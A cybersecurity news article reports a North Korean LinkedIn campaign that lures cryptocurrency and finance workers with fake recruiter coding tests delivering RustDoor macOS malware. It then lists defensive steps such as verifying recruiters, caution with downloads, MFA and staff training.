Hackers Are Attacking Cryptocurrency And Finance Sectors On LinkedIn With Malware

Cybersecurity researchers are sounding the alarm over ongoing cyberattacks from North Korean threat actors using LinkedIn to deliver malware. These actors are leveraging professional networks to target individuals in the cryptocurrency and financial sectors, luring them with fake job offers and coding tests to infiltrate networks.

In a recent case identified by Jamf Threat Labs, a user was contacted by a fake recruiter from a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi. This is part of a broader campaign by North Korea to infiltrate targeted organizations by posing as recruiters or interviewers. The malware being delivered in these attacks is called RustDoor, also known as Thiefbucket, and it represents a significant risk to businesses and individuals in the cryptocurrency sector.

Let’s break down this attack, who is at risk, and how to protect yourself.

Understanding the Vulnerability

The RustDoor malware campaign begins with highly tailored social engineering tactics, where cybercriminals impersonate recruiters and attempt to build trust with their targets. Once trust is established, they ask the victim to perform a task such as executing a coding test or downloading files, often packaged in legitimate-looking Visual Studio projects. However, hidden within these files are malicious scripts that download and install malware onto the victim's machine.

In the case uncovered by Jamf Threat Labs, victims were asked to download a Visual Studio project that contained embedded commands designed to execute malicious payloads. These payloads—VisualStudioHelper and zsh_env—act as backdoors that give attackers ongoing access to the victim's machine. RustDoor is particularly dangerous because it allows attackers to steal sensitive information, gain unauthorized access, and persist within the system without being easily detected.

The malware targets macOS systems, but previous campaigns have also targeted Windows machines using similar strategies. The malware can stay hidden by embedding itself into legitimate system processes, making it harder for standard antivirus software to detect it.

Who Is at Risk?

The primary targets of this campaign are individuals and companies within the cryptocurrency and decentralized finance (DeFi) sectors. North Korean cybercriminals have been known to focus on financial and crypto organizations due to their ability to generate significant illicit revenue.

People who are active on LinkedIn and other professional social networks are particularly vulnerable, as these platforms are being used to create fake recruiting profiles that appear highly credible. Professionals working in financial institutions, cryptocurrency exchanges, payment processing firms, and even government agencies may be approached by these fake recruiters.

Developers, in particular, are at high risk. The attack often involves asking the target to run Node.js or Python scripts or to clone GitHub repositories, which are common tasks for software engineers. Additionally, the use of Telegram channels for communication, as seen in other attacks, may further expose individuals to these risks.

How to Protect Yourself

Given the sophisticated nature of these attacks, it's crucial to take proactive steps to protect yourself and your organization. Here’s how:

1. Verify Recruiter Identities

If you’re contacted by someone on LinkedIn claiming to be a recruiter, especially from a cryptocurrency or finance firm, take steps to verify their identity. Reach out to the company they claim to represent directly, using contact information from their official website, rather than replying to their messages on LinkedIn.

2. Be Cautious with File Downloads

Never download or execute files, including coding tests or projects, unless you are certain they are from a trusted source. Cybercriminals often disguise malware as legitimate files, so always double-check before downloading.

3. Limit Personal Information on Professional Networks

Avoid sharing too much information on professional networks like LinkedIn. Threat actors may use details from your profile to craft convincing phishing attempts, including using knowledge of your current job or interests to lure you into their trap.

4. Use Endpoint Security Solutions

Ensure your computer is protected by up-to-date antivirus and endpoint protection software. These tools can help detect and block malware like RustDoor before it has a chance to compromise your system.

5. Enable Multi-Factor Authentication (MFA)

Adding an extra layer of security with multi-factor authentication can help protect your accounts and reduce the risk of unauthorized access, even if your credentials are compromised.

6. Educate Your Employees

If you manage a team or organization, especially in the cryptocurrency or finance sectors, educate your employees about the risks of social engineering and phishing attacks. Regular training on how to identify suspicious communications and avoid downloading unverified files is key to preventing these types of breaches.

7. Monitor for Unusual Activity

Stay vigilant for signs of unusual behavior on your devices, such as unexpected system performance issues, unfamiliar processes running in the background, or unprompted requests for your system password.

Conclusion

North Korean threat actors are becoming increasingly bold in their efforts to target individuals and companies in the cryptocurrency and financial sectors. The use of LinkedIn as a platform to initiate these attacks is a reminder of how social engineering tactics can be used to gain unauthorized access to systems and data.

By staying vigilant, verifying contacts, and implementing robust security measures, individuals and organizations can protect themselves against this growing threat. As attackers continue to evolve their strategies, it’s more important than ever to remain cautious and proactive in safeguarding your systems from malware like RustDoor.